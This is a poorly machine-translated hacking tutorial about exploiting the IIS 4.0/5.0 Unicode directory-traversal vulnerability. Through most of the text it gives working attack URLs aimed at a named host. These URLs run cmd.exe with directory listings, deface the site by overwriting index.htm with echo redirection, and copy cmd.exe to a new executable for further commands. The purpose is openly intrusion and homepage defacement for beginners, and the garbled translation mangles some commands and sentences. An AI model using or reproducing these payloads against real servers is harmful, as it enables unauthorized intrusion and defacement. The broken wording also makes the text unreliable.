IIS Unicode vulnerability attack

There are more than 10 common IIS vulnerabilities, but most of them are used.UnicodeResolution Error Vulnerability. Microsoft IIS 4.0/5.0 has a security vulnerability in the implementation of UNICODE character decoding. You can remotely execute arbitrary commands through IIS. When IIS opens a file, if the file name contains Unicode characters, it will decode it. If you provide some special encoding, IIS may mistakenly open or execute files or programs outside the Web root directory. This article introduces how to use this vulnerability to intrude into IIS.

For IIS 4.0/5.0 Chinese versions, When IIS contains a special encoding such as "% C1 % HH" or "% C0 % HH" in the file name of the URL request received by IIS ", it first decodes it into "0xc10xhh" and then tries to open the file. In Windows, "0xc10xhh" may be unicode encoded, so it will first decode it. If "0x00 <= % hh <0x40, the format used for decoding is similar to the following:

% C1 % hh-> (0xc1-0xc0) * 0x40 + 0xhh

% C0 % hh-> (0xc0-0xc0) * 0x40 + 0xhh

Therefore, using this encoding, we can construct many characters, such:

% C1 % 1C-> (0xc1-0xc0) * 0x40 + 0x1c = 0x5c = '/'

% C0 % 2f-> (0xc0-0xc0) * 0x40 + 0x2f = 0x2f = '\'

Attackers can exploit this vulnerability to bypass IIS path check and execute or open arbitrary files. This vulnerability starts with the Chinese version iis4.0 + SP6 and affects the Chinese version Win2000 + iis5.0 and the Chinese version Win2000 + iis5.0 + SP1.

In NT4, "/" is encoded as "% C1 % 9C", "% C0 % af" in Win2000 in English, and "% C1 % 1C" in Win2000 in Chinese ". In addition, there are multiple types of codes, which are not described one by one. You can check the information. This document uses Win2000 as an example. Replace it with other types.

Determine whether a vulnerability exists

Scanning with a scanner for this vulnerability is a common method. However, we know that scanning is not a real hacker attack, and it is just a way to find the entrance. IIS has many Unicode vulnerability scanners, such as rangescan or unicodescan, which can scan to collect server information. In addition to Unicode vulnerabilities, some Comprehensive scanning software also collects other server vulnerabilities-X-scan (: http://bitscn.com/upload/X-Scan-v3.1-cn.rar ).

Of course, you can also enter the following statement in IE browser for judgment:

Http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe? /C + dir

What I have learned about DOS should be understandable. In fact, it is to use the illegal request to connect us to system32. If the inetpub directory is not in the same drive letter As WinNT, or the directory level is changed, the request may fail.

If a vulnerability exists, you can see the following similar information in the browser area:

Directory of c: \ Inetpub \ scripts

<Dir> 〉.

<Dir> 〉..

Do you have the feeling of your own machine! This is what we need!

Cmd.exe is equivalent to command.com in DOS. Therefore, we can execute many commands!

Note: In the preceding judgment statement, "+" after "/C" is actually a space. Please remember! DIR is the command for viewing files and directories in DOS. If you do not know about DOS, go and learn.

After reading the above introduction, you do not need to know that we can use this vulnerability to attack the server!

Modify website homepage

1. Confirm the homepage name.

The first page of the General website is index.htm?index.html?index.asp=default.htm=defautl.html or default. asp. You can enter different homepage names to test and determine the homepage of the website to be modified. Enter the following three URLs in the IE address bar:

Http://aa.feedom.net/index.html

Http://aa.feedom.net/default.asp

Http://aa.feedom.net/index.htm

After testing the three network segments, we found that only the third network segment can be opened normally, indicating that the website's first page is named index.htm. Now, let's modify it!

2. Modification Principle

The most convenient method is the echo method: ECHO is a system command, which is mainly used to set the response switch.

Echo test> C: \ autoexec. Bat adds test to autoexec. BAT and deletes the original content;

Echo TimeDate> C: \ autoexec. Bat adds TimeDate but does not delete the original content.

Do you understand? Next, we can easily modify it.

3. Change the homepage

Enter the following address in IE:

Http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe? /C + echo + hahathisismyhack +> C: \ Inetpub \ wwwroot \ index.htm

The results returned by IE may be one of the following two situations:

1) HTTP 500-Internal Server Error

2) The parameter is incorrect

By returning information prompts and Analyzing cmd, it may be a parameter error in the command statement. Add the "symbol" and try again:

1) http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd ". EXE? /C + echo + hahathisismyhack +> C: \ Inetpub \ wwwroot \ index.htm

The hacker adds hahathisismyhackinto the index.htm file and deletes the original content.

2) http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd ". EXE? /C + echo + by2005-3-9 +> C: \ Inetpub \ wwwroot \ index.htm

Bytes adds by2005-3-9to the index.htm file, but does not delete the original content.

If it is normal, the responses of the above two statements should be CGI errors. This indicates that the statement is successfully executed, and the system only reports an error in a procedural manner, so ignore it.

Now let's open the website aa.feedom.net and check it out. What's going on? Have you gotten rid of it? In practice, due to the existence of directory permissions and other network management factors, this method may also fail. In this case, we can use copy cmd.exe to solve the problem in another. EXE file, but remember the path, do not make any mistakes. For example:

Http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe? /C‑copy‑cmd.exe + c: \ a.exe

Http://aa.feedom.net/scripts/..%c1%1c../a.exe? /C + echo + hackedbycshu +> C: \ Inetpub \ wwwroot \ index.htm

The technology mentioned in this article is relatively simple and suitable for beginners to study and learn. You may be able to modify the server homepage provided by us through the instance method in this article, but in actual operation, the server environment will inevitably change, and the obstacle may be something you have never studied or touched. Therefore, advanced capital is available only when basic knowledge is firmly grasped. You can refer to the knowledge points mentioned in this article for help in learning.